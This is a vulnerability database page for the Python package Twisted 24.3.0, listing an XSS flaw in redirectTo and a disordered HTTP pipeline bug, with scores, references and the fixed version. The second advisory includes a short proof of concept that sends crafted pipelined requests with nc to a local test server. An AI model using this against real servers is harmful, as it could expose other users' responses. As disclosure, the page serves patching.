Django REST framework

Lookup for vulnerable packages by Package URL.

Purl pkg:pypi/twisted@24.3.0

Type pypi

Namespace

Name twisted

Version 24.3.0

Qualifiers

Subpath

Is_vulnerable true

Next_non_vulnerable_version 24.7.0rc1

Latest_non_vulnerable_version 24.7.0rc1

Affected_by_vulnerabilities

url VCID-562c-1hjs-hqau

vulnerability_id VCID-562c-1hjs-hqau

summary Twisted is an event-based framework for internet applications, supporting Python 3.6+. The `twisted.web.util.redirectTo` function contains an HTML injection vulnerability. If application code allows an attacker to control the redirect URL this vulnerability may result in Reflected Cross-Site Scripting (XSS) in the redirect response HTML body. This vulnerability is fixed in 24.7.0rc1.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-41810.json

reference_id

reference_type

scores

value	4.2
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-41810.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2024-41810

reference_id

reference_type

scores

value	0.67844
scoring_system	epss
scoring_elements	0.98591
published_at	2026-04-16T12:55:00Z

value	0.67844
scoring_system	epss
scoring_elements	0.98586
published_at	2026-04-13T12:55:00Z

value	0.67844
scoring_system	epss
scoring_elements	0.98585
published_at	2026-04-12T12:55:00Z

value	0.67844
scoring_system	epss
scoring_elements	0.98583
published_at	2026-04-09T12:55:00Z

value	0.67844
scoring_system	epss
scoring_elements	0.98582
published_at	2026-04-08T12:55:00Z

value	0.67844
scoring_system	epss
scoring_elements	0.98578
published_at	2026-04-04T12:55:00Z

value	0.67844
scoring_system	epss
scoring_elements	0.98575
published_at	2026-04-02T12:55:00Z

value	0.67844
scoring_system	epss
scoring_elements	0.9858
published_at	2026-04-07T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2024-41810

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41810
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41810

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	6.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/pypa/advisory-database/tree/main/vulns/twisted/PYSEC-2024-75.yaml

reference_id

reference_type

scores

value	6.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

value	5.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/pypa/advisory-database/tree/main/vulns/twisted/PYSEC-2024-75.yaml

reference_url

https://github.com/twisted/twisted

reference_id

reference_type

scores

value	6.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

value	5.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/twisted/twisted

reference_url

https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33

reference_id

reference_type

scores

value	6.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

value	5.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-29T16:39:25Z/

url

https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33

reference_url

https://github.com/twisted/twisted/security/advisories/GHSA-cf56-g6w6-pqq2

reference_id

reference_type

scores

value	6.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	5.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-29T16:39:25Z/

url

https://github.com/twisted/twisted/security/advisories/GHSA-cf56-g6w6-pqq2

reference_url

https://lists.debian.org/debian-lts-announce/2024/11/msg00028.html

reference_id

reference_type

scores

value	6.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

value	5.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://lists.debian.org/debian-lts-announce/2024/11/msg00028.html

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2024-41810

reference_id

reference_type

scores

value	6.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

value	5.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2024-41810

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1077680
reference_id	1077680
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1077680

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2300497
reference_id	2300497
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2300497

reference_url

https://github.com/advisories/GHSA-cf56-g6w6-pqq2

reference_id

GHSA-cf56-g6w6-pqq2

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-cf56-g6w6-pqq2

reference_url	https://access.redhat.com/errata/RHSA-2024:7312
reference_id	RHSA-2024:7312
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:7312

reference_url	https://usn.ubuntu.com/6988-1/
reference_id	USN-6988-1
reference_type
scores
url	https://usn.ubuntu.com/6988-1/

fixed_packages

url	pkg:pypi/twisted@24.7.0rc1
purl	pkg:pypi/twisted@24.7.0rc1
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:pypi/twisted@24.7.0rc1

aliases CVE-2024-41810, GHSA-cf56-g6w6-pqq2, PYSEC-2024-75

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-562c-1hjs-hqau

url VCID-vz8r-fhqf-zudf

vulnerability_id VCID-vz8r-fhqf-zudf

summary

twisted.web has disordered HTTP pipeline response
### Summary

The HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure.

### PoC
0. Start a fresh Debian container:
```sh
docker run --workdir /repro --rm -it debian:bookworm-slim
```
1. Install twisted and its dependencies:
```sh
apt -y update && apt -y install ncat git python3 python3-pip \
    && git clone --recurse-submodules https://github.com/twisted/twisted \
    && cd twisted \
    && pip3 install --break-system-packages .
```
2. Run a twisted.web HTTP server that echos received requests' methods. e.g., the following:
```python
from twisted.web import server, resource
from twisted.internet import reactor

class TheResource(resource.Resource):
    isLeaf = True

    def render_GET(self, request) -> bytes:
        return b"GET"

    def render_POST(self, request) -> bytes:
        return b"POST"

site = server.Site(TheResource())
reactor.listenTCP(80, site)
reactor.run()
```
3. Send it a POST request with a chunked message body, pipelined with another POST request, wait a second, then send a GET request on the same connection:
```sh
(printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nPOST / HTTP/1.1\r\nContent-Length: 0\r\n\r\n'; sleep 1; printf 'GET / HTTP/1.1\r\n\r\n'; sleep 1) | nc localhost 80
```
4. Observe that the responses arrive out of order:
```
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:41 GMT
Content-Length: 5
Content-Type: text/html

POST
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:42 GMT
Content-Length: 4
Content-Type: text/html

GET
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:42 GMT
Content-Length: 5
Content-Type: text/html

POST
```

### Impact
See [GHSA-xc8x-vp79-p3wm](https://github.com/twisted/twisted/security/advisories/GHSA-xc8x-vp79-p3wm). Further, for instances of twisted.web HTTP servers deployed behind reverse proxies that implement connection pooling, it may be possible for remote attackers to receive responses intended for other clients of the twisted.web server.

references

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2024-41671

reference_id

reference_type

scores

value	0.00098
scoring_system	epss
scoring_elements	0.272
published_at	2026-04-04T12:55:00Z

value	0.00098
scoring_system	epss
scoring_elements	0.27107
published_at	2026-04-09T12:55:00Z

value	0.00098
scoring_system	epss
scoring_elements	0.27061
published_at	2026-04-08T12:55:00Z

value	0.00098
scoring_system	epss
scoring_elements	0.26992
published_at	2026-04-07T12:55:00Z

value	0.00098
scoring_system	epss
scoring_elements	0.27164
published_at	2026-04-02T12:55:00Z

value	0.00108
scoring_system	epss
scoring_elements	0.29116
published_at	2026-04-11T12:55:00Z

value	0.00108
scoring_system	epss
scoring_elements	0.2905
published_at	2026-04-16T12:55:00Z

value	0.00108
scoring_system	epss
scoring_elements	0.29021
published_at	2026-04-13T12:55:00Z

value	0.00108
scoring_system	epss
scoring_elements	0.29072
published_at	2026-04-12T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2024-41671

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41671
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41671

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	8.6
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/twisted/twisted

reference_id

reference_type

scores

value	8.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/twisted/twisted

reference_url

https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33

reference_id

reference_type

scores

value	8.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-29T18:59:07Z/

url

https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33

reference_url

https://github.com/twisted/twisted/commit/4a930de12fb67e88fefcb8822104152f42b27abc

reference_id

reference_type

scores

value	8.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-29T18:59:07Z/

url

https://github.com/twisted/twisted/commit/4a930de12fb67e88fefcb8822104152f42b27abc

reference_url

https://github.com/twisted/twisted/security/advisories/GHSA-c8m8-j448-xjx7

reference_id

reference_type

scores

value	8.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-29T18:59:07Z/

url

https://github.com/twisted/twisted/security/advisories/GHSA-c8m8-j448-xjx7

reference_url

https://lists.debian.org/debian-lts-announce/2024/11/msg00028.html

reference_id

reference_type

scores

value	8.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://lists.debian.org/debian-lts-announce/2024/11/msg00028.html

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2024-41671

reference_id

reference_type

scores

value	8.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2024-41671

reference_url

https://www.vicarius.io/vsociety/posts/disordered-http-pipeline-in-twistedweb-cve-2024-4167

reference_id

reference_type

scores

value	8.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://www.vicarius.io/vsociety/posts/disordered-http-pipeline-in-twistedweb-cve-2024-4167

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1077679
reference_id	1077679
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1077679

reference_url

https://github.com/advisories/GHSA-c8m8-j448-xjx7

reference_id

GHSA-c8m8-j448-xjx7

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-c8m8-j448-xjx7

reference_url	https://usn.ubuntu.com/6988-1/
reference_id	USN-6988-1
reference_type
scores
url	https://usn.ubuntu.com/6988-1/

reference_url	https://usn.ubuntu.com/6988-2/
reference_id	USN-6988-2
reference_type
scores
url	https://usn.ubuntu.com/6988-2/

fixed_packages

url	pkg:pypi/twisted@24.7.0rc1
purl	pkg:pypi/twisted@24.7.0rc1
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:pypi/twisted@24.7.0rc1

aliases CVE-2024-41671, GHSA-c8m8-j448-xjx7

risk_score 3.8

exploitability 0.5

weighted_severity 7.5

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vz8r-fhqf-zudf

Fixing_vulnerabilities

Risk_score 3.8

Resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/twisted@24.3.0

Package Instance